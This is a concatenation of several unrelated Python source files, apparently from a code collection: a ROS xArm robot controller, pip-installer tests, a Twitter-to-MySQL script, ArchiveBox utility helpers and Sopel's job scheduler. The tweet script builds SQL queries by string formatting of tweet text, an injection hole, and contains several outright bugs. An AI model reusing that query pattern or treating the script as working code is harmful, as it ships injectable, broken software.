def _set_joint_positions(self, joint_positions, durations=[1000, 1000, 1000, 1000, 1000, 1000]):
'''
Set the joint position of the arm. Achieve the desired position for each joint given
the duration of movement for each joint (measured in milliseconds).
@param duration: The duration time for each joint to go from the current joint state to the desired joint state.
'''
for index, joint in enumerate(self.joint_list):
if joint.name == "joint_4":
joint_positions[index] *= -1
self.arm.setPosition(joint.id, RAD_2_DEG(joint_positions[index]), duration=int(durations[index]), wait=False)
#Do a timer thingy here to estimate the current joint state
self.set_joint_state = np.array(joint_positions)
self.set_joint_duration = np.array(durations) / 1000.0
self.prev_joint_state = np.copy(self.joint_state)
self.start_state_estimation = True #kickoff the state estimation thread
def _control_mode_callback(self, req):
'''
Callback handle for the mode selection service to change the control mode
of the xarm.
'''
if(req.data):
self.mode = "EXECUTION"
else:
#turn off motors
self.arm.servoOff([joint.id for joint in self.joint_list])
self.mode = "WAYPOINT"
rospy.loginfo("xArm control mode changed to %s", self.mode)
response = SetBoolResponse()
response.success = True
response.message = self.mode
return response
def _state_estimation_thread(self):
'''
A thread that estimates the state of the joints given the joint command and the runtime since the
joint command was started.
'''
joint_state_msg = Float64MultiArray()
while(self.state_estimation_running):
if(self.start_state_estimation): #kickoff the predictions of state when a new joint state command is received.
self.start_state_estimation = False
start_time = time.time()
delta_t = 0.0
state_unreached = np.array([1.0, 1.0, 1.0, 1.0, 1.0, 1.0])
elapsed_time = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0])
m = (self.set_joint_state - self.prev_joint_state) / self.set_joint_duration
#estimate each of the joint states
while((not self.start_state_estimation) and (delta_t <= np.max(self.set_joint_duration))):
self.joint_state = self.prev_joint_state + m * elapsed_time
delta_t = time.time() - start_time
elapsed_time = state_unreached * delta_t
#determine which joints have reached their inteneded states
#if a joint has reach is state, don't update its joint state
#any more
for i in range(6):
if(delta_t >= self.set_joint_duration[i]):
state_unreached[i] = 0.0
self.joint_state[i] = self.set_joint_state[i]
else:
state_unreached[i] = 1.0
#publish the joint state
joint_state_msg.data = list(self.joint_state)
self.joint_state_pub.publish(joint_state_msg)
self.threading_looping_rate.sleep()
elif(self.mode == "WAYPOINT"):
#Read the state of each servo directly. This is very slow because
#of the request and response time of serial data to each servo.
#unfortunately the read is so slow that the publish rate in this
#mode is < 10Hz.
for index, joint in enumerate(self.joint_list):
position = self.arm.getPosition(joint.id, True)
if(joint.name == "joint_4"):
position *= -1
self.joint_state[index] = DEG_2_RAD(position)
#publish the joint state
joint_state_msg.data = list(self.joint_state)
self.joint_state_pub.publish(joint_state_msg)
self.threading_looping_rate.sleep()
else:
#publish the joint state
joint_state_msg.data = list(self.joint_state)
self.joint_state_pub.publish(joint_state_msg)
self.threading_looping_rate.sleep()
def run(self):
'''
Main running loop. Publishes joint states at set frequency.
'''
try:
while not rospy.is_shutdown():
#publish the joint states at 100Hz.
#joint_state_msg = Float64MultiArray()
#joint_state_msg.data = list(self.joint_state)
#self.joint_state_pub.publish(joint_state_msg)
self.looping_rate.sleep()
except rospy.ROSInterruptException:
pass
if __name__ == "__main__":
xarm = xArmController()
xarm.run()
|
test_pip_package_installer.py
|
import os
import re
import pytest
import threading
from script_runner import PipPackageInstaller
@pytest.mark.pip_package_installer
def test_property_access_1():
pip_package_installer = PipPackageInstaller()
with pytest.raises(InterruptedError, match=r".*once.*script.*completed.*"):
pip_package_installer.output
with pytest.raises(InterruptedError, match=r".*once.*script.*completed.*"):
pip_package_installer.result
pip_package_installer.run()
with pytest.raises(InterruptedError, match=r".*packages.*installed.*"):
pip_package_installer.run()
print(pip_package_installer.output, pip_package_installer.result)
assert pip_package_installer.result == 0
@pytest.mark.pip_package_installer
def test_property_threaded_access_1():
pip_package_installer = PipPackageInstaller()
thread_count = 10
success_runs, failed_runs = 0, 0
def thread_function():
nonlocal pip_package_installer, success_runs, failed_runs
try:
pip_package_installer.run()
success_runs = success_runs + 1
except InterruptedError:
failed_runs = failed_runs + 1
threads = [
threading.Thread(target=thread_function) for _ in range(thread_count)
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
assert success_runs == 1
assert failed_runs == thread_count - 1
@pytest.mark.pip_package_installer
def test_property_threaded_access_2():
pip_package_installer = PipPackageInstaller()
predicted = 0
def thread_function_run(should_fail: bool):
nonlocal pip_package_installer, predicted
try:
pip_package_installer.run()
predicted = predicted + int(not should_fail) * 2 - 1
except InterruptedError:
predicted = predicted + int(should_fail) * 2 - 1
def thread_function_property(should_fail: bool):
nonlocal pip_package_installer, predicted
try:
_ = pip_package_installer.output
_ = pip_package_installer.result
predicted = predicted + int(not should_fail) * 2 - 1
except InterruptedError:
predicted = predicted + int(should_fail) * 2 - 1
thread1 = threading.Thread(target=thread_function_property, args=(True, ))
thread2 = threading.Thread(target=thread_function_property, args=(True, ))
thread1.start(), thread2.start()
thread1.join(), thread2.join()
assert predicted == 2
thread3 = threading.Thread(target=thread_function_run, args=(False, ))
thread4 = threading.Thread(target=thread_function_run, args=(False, ))
thread3.start(), thread4.start()
thread3.join(), thread4.join()
assert predicted == 2
thread5 = threading.Thread(target=thread_function_property, args=(False, ))
thread6 = threading.Thread(target=thread_function_property, args=(True, ))
thread5.start(), thread6.start()
thread5.join(), thread6.join()
assert predicted == 2
@pytest.mark.pip_package_installer
@pytest.mark.parametrize("packages", [[("requests", "2.18.4")],
[("requests", "2.18.4"),
("random-profile", "0.0.5"),
("empty-package", "0.0.1")],
[("empty-package", "0.0.3"),
("rsokl-dummy", "0.1.2")]])
def test_install_packages_1(packages):
packages_to_install = "\n".join(f"{package}=={version}"
for package, version in packages)
pip_package_installer = PipPackageInstaller(packages=packages_to_install)
pip_package_installer.run()
print(pip_package_installer.output, pip_package_installer.result)
assert pip_package_installer.result == 0
for package, version in packages:
sys_pip_packages = os.popen("pip list").read()
pattern = f"{re.escape(package)}.*{re.escape(version)}"
assert bool(re.search(pattern, sys_pip_packages))
@pytest.mark.pip_package_installer
@pytest.mark.parametrize("package, version",
[("inexistent_package", "0.69.42.0"),
("some_random_XXX_pack", "1.2.3"),
("requests", "10.99.33")])
def test_install_packages_2(package, version):
package_to_install = f"{package}=={version}"
pip_package_installer = PipPackageInstaller(packages=package_to_install)
pip_package_installer.run()
print(pip_package_installer.output, pip_package_installer.result)
assert pip_package_installer.result == 1
assert "No matching distribution found" in pip_package_installer.output
|
find_tweets.py
|
import configparser
import tweepy
import argparse
import json
import pymysql.cursors
import logging
import logging.config
import datetime
import threading
class Log:
logs = logging.getLogger('find_tweets')
class Config:
def __init__(self, filename="find-tweets.cfg", logger=None):
self.filename = filename
config = configparser.SafeConfigParser({'mysql_port': 3306})
try:
with open(filename) as f:
config.readfp(f)
except IOError:
self.logger.critical("Error opening config file {}!".format(filename))
exit()
try:
self.consumer_token = config.get("Twitter auth", "consumer_token")
except configparser.NoOptionError:
Log.logs.critical("Missing consumer_token in 'Twitter auth' section in config file!")
exit()
try:
self.consumer_secret = config.get("Twitter auth", "consumer_secret")
except configparser.NoOptionError:
Log.logs.critical("Missing consumer_secret in 'Twitter auth' section in config file!")
exit()
try:
self.access_token = config.get("Twitter auth", "access_token")
except configparser.NoOptionError:
Log.logs.critical("Missing access_token in 'Twitter auth' section in config file!")
exit()
try:
self.access_token_secret = config.get("Twitter auth", "access_token_secret")
except configparser.NoOptionError:
Log.logs.critical("Missing access_token_secret in 'Twitter auth' section in config file!")
try:
self.search_terms = [e.strip() for e in config.get("Twitter", "search_terms").split(",")]
except configparser.NoOptionError:
Log.logs.critical("Missing search_terms in 'Twitter' section in config file!")
try:
self.mysql_server = config.get("mysql", "server")
except configparser.NoOptionError:
Log.logs.critical("Missing server in 'mysql' section in config file!")
self.mysql_port = config.get("mysql", "server_port")
try:
self.mysql_username = config.get("mysql", "username")
except configparser.NoOptionError:
Log.logs.critical("Missing username in 'mysql' section in config file!")
try:
self.mysql_password = config.get("mysql", "password")
except configparser.NoOptionError:
Log.logs.critical("Missing password in 'mysql' section in config file!")
try:
self.mysql_db_name = config.get("mysql", "db_name")
except configparser.NoOptionError:
Log.logs.critical("Missing db_name in 'mysql' section in config file!")
def check_updates(self, config_change):
# watch config file
config_change.set()
class SearchStream(tweepy.StreamListener):
def __init__(self, db):
self.db = db
super(SearchStream, self).__init__()
def on_data(self, data):
log.logs.debug(str(data))
data_dict = json.loads(data)
Log.logs.debug(str(data_dict))
self.db.insert_tweet(data_dict["user"]["name"], data_dict["user"]["screen_name"], data_dict["id"]. data_dict["text"], data_dict["created_at"])
def on_error(self, status):
if status == "420":
print("420 error")
return False
def twitter_search(config, config_change):
db = MySQL(config)
listener = SearchStream(db)
oauth = tweepy.OAuthHandler(config.consumer_token, config.consumer_secret)
oauth.set_access_token = (config.access_token, config.access_token_secret)
stream = tweepy.Stream(auth=auth, listener=listener)
Log.logs.info("Starting twitter stream")
stream.filter(track=config.search_terms, async=True)
while True:
config_change.wait()
Log.logs.info("Config change detected!")
Log.logs.debug("New search terms: {}".format(config.search_terms))
stream.disconnect()
sleep(20)
stream.filter(track=config.search_terms, async=True)
class MySQL:
def __init__(self, config):
try:
self.connection = pymysql.connect(host=config.mysql_server, user=config.mysql_username, password=config.mysql_password, db=config.mysql_db_name, port=config.mysql_port, charset='utf8mb4', cursorclass=pymysql.cursors.DictCursor)
except pymysql.Error as e:
log.logs.critical("MySQL: unable to open connection: {}".format(str(e)))
def insert_tweet(self, username, screen_name, id, text, date):
try:
with self.connection.cursor() as cursor:
cursor.execute("""INSERT INTO `tweets`
(`username`, `screen_name`, `id`, `text`, `date`)
VALUES ({1}, {2}, {3}, {4}, {5})""".format(username, screen_name, id, text, date))
connection.commit()
except pymysql.Error as e:
log.logs.critical("MySQL: error inserting into the DB: {}".format(str(e)))
finally:
self.connection.close()
if __name__ == "__main__":
Log.logs.info("Starting find_tweets")
parser = argparse.ArgumentParser(description="Find tweets and dump them into a database")
parser.add_argument("--config", nargs="?", default="find-tweets.cfg", help="config file to use (default is find_tweets.cfg)")
parser.add_argument("--logconfig", nargs="?", default="logging.ini", help="config file for logging (default is logging.ini")
args = parser.parse_args()
try:
logging.config.fileConfig(args.logconfig)
except configparser.NoSectionError:
logging.basicConfig()
log.logs.critical("Logging config file not found: {}".format(args.logconfig))
Log.logs.debug(args)
config = Config(args.config)
config_change = threading.event
config_thread = threading.Thread(target=config.check_updates, args=(config_change))
config_thread.start()
twitter_search(config, config_change)
|
util.py
|
import os
import re
import sys
import time
from urllib.request import Request, urlopen
from urllib.parse import urlparse, quote
from decimal import Decimal
from datetime import datetime
from multiprocessing import Process
from subprocess import TimeoutExpired, Popen, PIPE, DEVNULL, CompletedProcess, CalledProcessError
from config import (
ANSI,
TERM_WIDTH,
REPO_DIR,
SOURCES_DIR,
ARCHIVE_DIR,
OUTPUT_PERMISSIONS,
TIMEOUT,
SHOW_PROGRESS,
CHECK_SSL_VALIDITY,
WGET_USER_AGENT,
CURL_BINARY,
WGET_BINARY,
CHROME_BINARY,
GIT_BINARY,
YOUTUBEDL_BINARY,
FETCH_TITLE,
FETCH_FAVICON,
FETCH_WGET,
FETCH_WARC,
FETCH_PDF,
FETCH_SCREENSHOT,
FETCH_DOM,
FETCH_GIT,
FETCH_MEDIA,
SUBMIT_ARCHIVE_DOT_ORG,
ARCHIVE_DIR_NAME,
)
### Parsing Helpers
# Url Parsing: https://docs.python.org/3/library/urllib.parse.html#url-parsing
scheme = lambda url: urlparse(url).scheme
without_scheme = lambda url: urlparse(url)._replace(scheme='').geturl().strip('//')
without_query = lambda url: urlparse(url)._replace(query='').geturl().strip('//')
without_fragment = lambda url: urlparse(url)._replace(fragment='').geturl().strip('//')
without_path = lambda url: urlparse(url)._replace(path='', fragment='', query='').geturl().strip('//')
path = lambda url: urlparse(url).path
basename = lambda url: urlparse(url).path.rsplit('/', 1)[-1]
domain = lambda url: urlparse(url).netloc
query = lambda url: urlparse(url).query
fragment = lambda url: urlparse(url).fragment
extension = lambda url: basename(url).rsplit('.', 1)[-1].lower() if '.' in basename(url) else ''
base_url = lambda url: without_scheme(url) # uniq base url used to dedupe links
short_ts = lambda ts: ts.split('.')[0]
URL_REGEX = re.compile(
r'http[s]?://' # start matching from allowed schemes
r'(?:[a-zA-Z]|[0-9]' # followed by allowed alphanum characters
r'|[$-_@.&+]|[!*\(\),]' # or allowed symbols
r'|(?:%[0-9a-fA-F][0-9a-fA-F]))' # or allowed unicode bytes
r'[^\]\[\(\)<>\""\'\s]+', # stop parsing at these symbols
re.IGNORECASE,
)
HTML_TITLE_REGEX = re.compile(
r'<title>' # start matching text after <title> tag
r'(.[^<>]+)', # get everything up to these symbols
re.IGNORECASE,
)
### Checks & Tests
def check_link_structure(link):
"""basic sanity check invariants to make sure the data is valid"""
assert isinstance(link, dict)
assert isinstance(link.get('url'), str)
assert len(link['url']) > 2
assert len(re.findall(URL_REGEX, link['url'])) == 1
def check_links_structure(links):
"""basic sanity check invariants to make sure the data is valid"""
assert isinstance(links, list)
if links:
check_link_structure(links[0])
def check_dependencies():
"""Check that all necessary dependencies are installed, and have valid versions"""
python_vers = float('{}.{}'.format(sys.version_info.major, sys.version_info.minor))
if python_vers < 3.5:
print('{}[X] Python version is not new enough: {} (>3.5 is required){}'.format(ANSI['red'], python_vers, ANSI['reset']))
print(' See https://github.com/pirate/ArchiveBox#troubleshooting for help upgrading your Python installation.')
raise SystemExit(1)
if FETCH_FAVICON or SUBMIT_ARCHIVE_DOT_ORG:
if run(['which', CURL_BINARY], stdout=DEVNULL).returncode or run([CURL_BINARY, '--version'], stdout=DEVNULL).returncode:
print('{red}[X] Missing dependency: curl{reset}'.format(**ANSI))
print(' Run ./setup.sh, then confirm it was installed with: {} --version'.format(CURL_BINARY))
print(' See https://github.com/pirate/ArchiveBox for help.')
raise SystemExit(1)
if FETCH_WGET or FETCH_WARC:
if run(['which', WGET_BINARY], stdout=DEVNULL).returncode or run([WGET_BINARY, '--version'], stdout=DEVNULL).returncode:
print('{red}[X] Missing dependency: wget{reset}'.format(**ANSI))
print(' Run ./setup.sh, then confirm it was installed with: {} --version'.format(WGET_BINARY))
print(' See https://github.com/pirate/ArchiveBox for help.')
raise SystemExit(1)
if FETCH_PDF or FETCH_SCREENSHOT or FETCH_DOM:
if run(['which', CHROME_BINARY], stdout=DEVNULL).returncode:
print('{}[X] Missing dependency: {}{}'.format(ANSI['red'], CHROME_BINARY, ANSI['reset']))
print(' Run ./setup.sh, then confirm it was installed with: {} --version'.format(CHROME_BINARY))
print(' See https://github.com/pirate/ArchiveBox for help.')
raise SystemExit(1)
# parse chrome --version e.g. Google Chrome 61.0.3114.0 canary / Chromium 59.0.3029.110 built on Ubuntu, running on Ubuntu 16.04
try:
result = run([CHROME_BINARY, '--version'], stdout=PIPE)
version_str = result.stdout.decode('utf-8')
version_lines = re.sub("(Google Chrome|Chromium) (\\d+?)\\.(\\d+?)\\.(\\d+?).*?$", "\\2", version_str).split('\n')
version = [l for l in version_lines if l.isdigit()][-1]
if int(version) < 59:
print(version_lines)
print('{red}[X] Chrome version must be 59 or greater for headless PDF, screenshot, and DOM saving{reset}'.format(**ANSI))
print(' See https://github.com/pirate/ArchiveBox for help.')
raise SystemExit(1)
except (IndexError, TypeError, OSError):
print('{red}[X] Failed to parse Chrome version, is it installed properly?{reset}'.format(**ANSI))
print(' Run ./setup.sh, then confirm it was installed with: {} --version'.format(CHROME_BINARY))
print(' See https://github.com/pirate/ArchiveBox for help.')
raise SystemExit(1)
if FETCH_GIT:
if run(['which', GIT_BINARY], stdout=DEVNULL).returncode or run([GIT_BINARY, '--version'], stdout=DEVNULL).returncode:
print('{red}[X] Missing dependency: git{reset}'.format(**ANSI))
print(' Run ./setup.sh, then confirm it was installed with: {} --version'.format(GIT_BINARY))
print(' See https://github.com/pirate/ArchiveBox for help.')
raise SystemExit(1)
if FETCH_MEDIA:
if run(['which', YOUTUBEDL_BINARY], stdout=DEVNULL).returncode or run([YOUTUBEDL_BINARY, '--version'], stdout=DEVNULL).returncode:
print('{red}[X] Missing dependency: youtube-dl{reset}'.format(**ANSI))
print(' Run ./setup.sh, then confirm it was installed with: {} --version'.format(YOUTUBEDL_BINARY))
print(' See https://github.com/pirate/ArchiveBox for help.')
raise SystemExit(1)
def check_url_parsing():
"""Check that plain text regex URL parsing works as expected"""
test_urls = '''
https://example1.com/what/is/happening.html?what=1#how-about-this=1
https://example2.com/what/is/happening/?what=1#how-about-this=1
HTtpS://example3.com/what/is/happening/?what=1#how-about-this=1f
https://example4.com/what/is/happening.html
https://example5.com/
https://example6.com
<test>http://example7.com</test>
[https://example8.com/what/is/this.php?what=1]
[and http://example9.com?what=1&other=3#and-thing=2]
<what>https://example10.com#and-thing=2 "</about>
abc<this["https://example11.com/what/is#and-thing=2?whoami=23&where=1"]that>def
sdflkf[what](https://example12.com/who/what.php?whoami=1#whatami=2)?am=hi
example13.bada
and example14.badb
<or>htt://example15.badc</that>
'''
# print('\n'.join(re.findall(URL_REGEX, test_urls)))
assert len(re.findall(URL_REGEX, test_urls)) == 12
### Random Helpers
def save_stdin_source(raw_text):
if not os.path.exists(SOURCES_DIR):
os.makedirs(SOURCES_DIR)
ts = str(datetime.now().timestamp()).split('.', 1)[0]
source_path = os.path.join(SOURCES_DIR, '{}-{}.txt'.format('stdin', ts))
with open(source_path, 'w', encoding='utf-8') as f:
f.write(raw_text)
return source_path
def save_remote_source(url, timeout=TIMEOUT):
"""download a given url's content into output/sources/domain-<timestamp>.txt"""
if not os.path.exists(SOURCES_DIR):
os.makedirs(SOURCES_DIR)
ts = str(datetime.now().timestamp()).split('.', 1)[0]
source_path = os.path.join(SOURCES_DIR, '{}-{}.txt'.format(domain(url), ts))
print('{}[*] [{}] Downloading {}{}'.format(
ANSI['green'],
datetime.now().strftime('%Y-%m-%d %H:%M:%S'),
url,
ANSI['reset'],
))
end = progress(TIMEOUT, prefix=' ')
try:
downloaded_xml = download_url(url, timeout=timeout)
end()
except Exception as e:
end()
print('{}[!] Failed to download {}{}\n'.format(
ANSI['red'],
url,
ANSI['reset'],
))
print(' ', e)
raise SystemExit(1)
with open(source_path, 'w', encoding='utf-8') as f:
f.write(downloaded_xml)
print(' > {}'.format(pretty_path(source_path)))
return source_path
def fetch_page_title(url, timeout=10, progress=SHOW_PROGRESS):
"""Attempt to guess a page's title by downloading the html"""
if not FETCH_TITLE:
return None
try:
if progress:
sys.stdout.write('.')
sys.stdout.flush()
html = download_url(url, timeout=timeout)
match = re.search(HTML_TITLE_REGEX, html)
return match.group(1).strip() if match else None
except Exception as err:
# print('[!] Failed to fetch title because of {}: {}'.format(
# err.__class__.__name__,
# err,
# ))
return None
def wget_output_path(link, look_in=None):
"""calculate the path to the wgetted .html file, since wget may
adjust some paths to be different than the base_url path.
See docs on wget --adjust-extension (-E)
"""
# if we have it stored, always prefer the actual output path to computed one
if link.get('latest', {}).get('wget'):
return link['latest']['wget']
urlencode = lambda s: quote(s, encoding='utf-8', errors='replace')
if link['type'] in ('PDF', 'image'):
return urlencode(base_url(link['url']))
# Since the wget algorithm to for -E (appending .html) is incredibly complex
# instead of trying to emulate it here, we just look in the output folder
# to see what html file wget actually created as the output
wget_folder = base_url(link['url']).rsplit('/', 1)[0].split('/')
look_in = os.path.join(ARCHIVE_DIR, link['timestamp'], *wget_folder)
if look_in and os.path.exists(look_in):
html_files = [
f for f in os.listdir(look_in)
if re.search(".+\\.[Hh][Tt][Mm][Ll]?$", f, re.I | re.M)
]
if html_files:
return urlencode(os.path.join(*wget_folder, html_files[0]))
return None
# If finding the actual output file didn't work, fall back to the buggy
# implementation of the wget .html appending algorithm
# split_url = link['url'].split('#', 1)
# query = ('%3F' + link['url'].split('?', 1)[-1]) if '?' in link['url'] else ''
# if re.search(".+\\.[Hh][Tt][Mm][Ll]?$", split_url[0], re.I | re.M):
# # already ends in .html
# return urlencode(base_url(link['url']))
# else:
# # .html needs to be appended
# without_scheme = split_url[0].split('://', 1)[-1].split('?', 1)[0]
# if without_scheme.endswith('/'):
# if query:
# return urlencode('#'.join([without_scheme + 'index.html' + query + '.html', *split_url[1:]]))
# return urlencode('#'.join([without_scheme + 'index.html', *split_url[1:]]))
# else:
# if query:
# return urlencode('#'.join([without_scheme + '/index.html' + query + '.html', *split_url[1:]]))
# elif '/' in without_scheme:
# return urlencode('#'.join([without_scheme + '.html', *split_url[1:]]))
# return urlencode(base_url(link['url']) + '/index.html')
### String Manipulation & Logging Helpers
def str_between(string, start, end=None):
"""(<abc>12345</def>, <abc>, </def>) -> 12345"""
content = string.split(start, 1)[-1]
if end is not None:
content = content.rsplit(end, 1)[0]
return content
def pretty_path(path):
"""convert paths like .../ArchiveBox/archivebox/../output/abc into output/abc"""
return path.replace(REPO_DIR + '/', '')
def print_error_hints(cmd, pwd, err=None, hints=None, prefix=' '):
"""quote the argument with whitespace in a command so the user can
copy-paste the outputted string directly to run the cmd
"""
quoted_cmd = ' '.join(
'"{}"'.format(arg) if ' ' in arg else arg
for arg in cmd
)
output_lines = [
'{}Failed: {} {}{}'.format(ANSI['red'], err.__class__.__name__, err, ANSI['reset']),
' {}{}{}'.format(ANSI['lightyellow'], hints, ANSI['reset']) if hints else None,
'Run to see full output:'
' cd {};'.format(pwd),
' {}'.format(quoted_cmd),
]
return '\n'.join(
'{}{}'.format(prefix, line)
for line in output_lines
if line
)
### Link Helpers
def merge_links(a, b):
"""deterministially merge two links, favoring longer field values over shorter,
and "cleaner" values over worse ones.
"""
longer = lambda key: (a[key] if len(a[key]) > len(b[key]) else b[key]) if (a[key] and b[key]) else (a[key] or b[key])
earlier = lambda key: a[key] if a[key] < b[key] else b[key]
url = longer('url')
longest_title = longer('title')
cleanest_title = a['title'] if '://' not in (a['title'] or '') else b['title']
link = {
'timestamp': earlier('timestamp'),
'url': url,
'domain': domain(url),
'base_url': base_url(url),
'tags': longer('tags'),
'title': longest_title if '://' not in (longest_title or '') else cleanest_title,
'sources': list(set(a.get('sources', []) + b.get('sources', []))),
}
link['type'] = get_link_type(link)
return link
def get_link_type(link):
"""Certain types of links need to be handled specially, this figures out when that's the case"""
if extension(link['url']) == 'pdf':
return 'PDF'
elif extension(link['url']) in ('pdf', 'png', 'jpg', 'jpeg', 'svg', 'bmp', 'gif', 'tiff', 'webp'):
return 'image'
elif 'wikipedia.org' in domain(link['url']).lower():
return 'wiki'
elif 'youtube.com' in domain(link['url']).lower():
return 'youtube'
elif 'soundcloud.com' in domain(link['url']).lower():
return 'soundcloud'
elif 'youku.com' in domain(link['url']).lower():
return 'youku'
elif 'vimeo.com' in domain(link['url']).lower():
return 'vimeo'
return None
def derived_link_info(link):
"""extend link info with the archive urls and other derived data"""
url = link['url']
to_date_str = lambda ts: datetime.fromtimestamp(Decimal(ts)).strftime('%Y-%m-%d %H:%M')
extended_info = {
**link,
'link_dir': '{}/{}'.format(ARCHIVE_DIR_NAME, link['timestamp']),
'bookmarked_date': to_date_str(link['timestamp']),
'updated_date': to_date_str(link['updated']) if 'updated' in link else None,
'domain': domain(url),
'path': path(url),
'basename': basename(url),
'base_url': base_url(url),
}
# Archive Method Output URLs
extended_info = {
**extended_info,
'index_url': 'index.html',
'favicon_url': 'favicon.ico',
'google_favicon_url': 'https://www.google.com/s2/favicons?domain={domain}'.format(**extended_info),
'archive_url': wget_output_path(link) or 'index.html',
'warc_url': 'warc',
'pdf_url': 'output.pdf',
'screenshot_url': 'screenshot.png',
'dom_url': 'output.html',
'archive_org_url': 'https://web.archive.org/web/{base_url}'.format(**extended_info),
'git_url': 'git',
'media_url': 'media',
}
# PDF and images are handled slightly differently
# wget, screenshot, & pdf urls all point to the same file
if link['type'] in ('PDF', 'image'):
extended_info.update({
'title': basename(link['url']),
'archive_url': base_url(url),
'pdf_url': base_url(url),
'screenshot_url': base_url(url),
'dom_url': base_url(url),
})
return extended_info
### Python / System Helpers
def progress(seconds=TIMEOUT, prefix=''):
"""Show a (subprocess-controlled) progress bar with a <seconds> timeout,
returns end() function to instantly finish the progress
"""
if not SHOW_PROGRESS:
return lambda: None
def progress_bar(seconds, prefix):
"""show timer in the form of progress bar, with percentage and seconds remaining"""
chunk = '█' if sys.stdout.encoding == 'UTF-8' else '#'
chunks = TERM_WIDTH - len(prefix) - 20 # number of progress chunks to show (aka max bar width)
try:
for s in range(seconds * chunks):
progress = s / chunks / seconds * 100
bar_width = round(progress/(100/chunks))
# ████████████████████ 0.9% (1/60sec)
sys.stdout.write('\r{0}{1}{2}{3} {4}% ({5}/{6}sec)'.format(
prefix,
ANSI['green'],
(chunk * bar_width).ljust(chunks),
ANSI['reset'],
round(progress, 1),
round(s/chunks),
seconds,
))
sys.stdout.flush()
time.sleep(1 / chunks)
# ██████████████████████████████████ 100.0% (60/60sec)
sys.stdout.write('\r{0}{1}{2}{3} {4}% ({5}/{6}sec)\n'.format(
prefix,
ANSI['red'],
chunk * chunks,
ANSI['reset'],
100.0,
seconds,
seconds,
))
sys.stdout.flush()
except KeyboardInterrupt:
print()
pass
p = Process(target=progress_bar, args=(seconds, prefix))
p.start()
def end():
"""immediately finish progress and clear the progressbar line"""
# protect from double termination
#if p is None or not hasattr(p, 'kill'):
# return
nonlocal p
if p is not None:
p.terminate()
p = None
sys.stdout.write('\r{}{}\r'.format((' ' * TERM_WIDTH), ANSI['reset'])) # clear whole terminal line
sys.stdout.flush()
return end
def download_url(url, timeout=TIMEOUT):
req = Request(url, headers={'User-Agent': WGET_USER_AGENT})
if CHECK_SSL_VALIDITY:
resp = urlopen(req, timeout=timeout)
else:
import ssl
insecure = ssl._create_unverified_context()
resp = urlopen(req, timeout=timeout, context=insecure)
encoding = resp.headers.get_content_charset() or 'utf-8'
return resp.read().decode(encoding)
def chmod_file(path, cwd='.', permissions=OUTPUT_PERMISSIONS, timeout=30):
"""chmod -R <permissions> <cwd>/<path>"""
if not os.path.exists(os.path.join(cwd, path)):
raise Exception('Failed to chmod: {} does not exist (did the previous step fail?)'.format(path))
chmod_result = run(['chmod', '-R', permissions, path], cwd=cwd, stdout=DEVNULL, stderr=PIPE, timeout=timeout)
if chmod_result.returncode == 1:
print(' ', chmod_result.stderr.decode())
raise Exception('Failed to chmod {}/{}'.format(cwd, path))
def run(*popenargs, input=None, capture_output=False, timeout=None, check=False, **kwargs):
"""Patched of subprocess.run to fix blocking io making timeout=innefective"""
if input is not None:
if 'stdin' in kwargs:
raise ValueError('stdin and input arguments may not both be used.')
kwargs['stdin'] = PIPE
if capture_output:
if ('stdout' in kwargs) or ('stderr' in kwargs):
raise ValueError('stdout and stderr arguments may not be used '
'with capture_output.')
kwargs['stdout'] = PIPE
kwargs['stderr'] = PIPE
with Popen(*popenargs, **kwargs) as process:
try:
stdout, stderr = process.communicate(input, timeout=timeout)
except TimeoutExpired:
process.kill()
try:
stdout, stderr = process.communicate(input, timeout=2)
except:
pass
raise TimeoutExpired(popenargs[0][0], timeout)
except BaseException as err:
process.kill()
# We don't call process.wait() as .__exit__ does that for us.
raise
retcode = process.poll()
if check and retcode:
raise CalledProcessError(retcode, process.args,
output=stdout, stderr=stderr)
return CompletedProcess(process.args, retcode, stdout, stderr)
|
jobs.py
|
# coding=utf-8
"""Sopel's Job Scheduler: internal tool for job management.
.. note::
As of Sopel 5.3, :mod:`sopel.tools.jobs` is an internal tool. Therefore,
it is not shown in the public documentation.
"""
from __future__ import unicode_literals, absolute_import, print_function, division
import datetime
import sys
import threading
import time
py3 = sys.version_info.major >= 3
class JobScheduler(threading.Thread):
"""Calls jobs assigned to it in steady intervals.
JobScheduler is a thread that keeps track of Jobs and calls them every
X seconds, where X is a property of the Job.
Thread safety is ensured with an internal mutex.
It runs forever until the :attr:`stopping` event is set using the
:meth:`stop` method.
"""
def __init__(self, bot):
"""Requires bot as argument for logging."""
threading.Thread.__init__(self)
self.bot = bot
self.stopping = threading.Event()
self._jobs = []
self._mutex = threading.Lock()
def add_job(self, job):
"""Add a Job to the current job queue."""
with self._mutex:
self._jobs.append(job)
def clear_jobs(self):
"""Clear current Job queue and start fresh."""
with self._mutex:
self._jobs = []
def stop(self):
"""Ask the job scheduler to stop.
The scheduler thread will stop its loop over jobs to process, but it
won't join the thread, or clear its queue—this has to be done
separately by the calling thread.
"""
self.stopping.set()
def remove_callable_job(self, callable):
"""Removes specific callable from job queue"""
with self._mutex:
self._jobs = [
job for job in self._jobs
if job.func != callable
]
def run(self):
"""Run forever until :attr:`stopping` event is set."""
while not self.stopping.is_set():
try:
now = time.time()
# Collect ready jobs by now
for job in self._get_ready_jobs(now):
self._run_job(job)
# Wait up to a second
time_spent = time.time() - now
wait_time = max(0, 1 - time_spent)
if wait_time:
time.sleep(wait_time)
except KeyboardInterrupt:
# Do not block on KeyboardInterrupt
raise
except Exception: # TODO: Be specific
# Modules exceptions are caught earlier, so this is a bit
# more serious. Options are to either stop the main thread
# or continue this thread and hope that it won't happen
# again.
self.bot.error()
# Sleep a bit to guard against busy-looping and filling
# the log with useless error messages.
time.sleep(10.0) # seconds
def _get_ready_jobs(self, now):
with self._mutex:
jobs = [job for job in self._jobs if job.is_ready_to_run(now)]
return jobs
def _run_job(self, job):
if job.func.thread:
t = threading.Thread(
target=self._call, args=(job.func,)
)
t.start()
else:
self._call(job.func)
job.next()
def _call(self, func):
"""Wrapper for collecting errors from modules."""
try:
func(self.bot)
except KeyboardInterrupt:
# Do not block on KeyboardInterrupt
raise
except Exception: # TODO: Be specific
self.bot.error()
class Job(object):
"""Hold information about when a function should be called next.
Job is a simple structure that hold information about when a function
should be called next.
They can be put in a priority queue, in which case the Job that should
be executed next is returned.
Calling the method next modifies the Job object for the next time it
should be executed. Current time is used to decide when the job should
be executed next so it should only be called right after the function
was called.
"""
max_catchup = 5
"""How many seconds the job can get behind.
This governs how much the scheduling of jobs is allowed to get behind
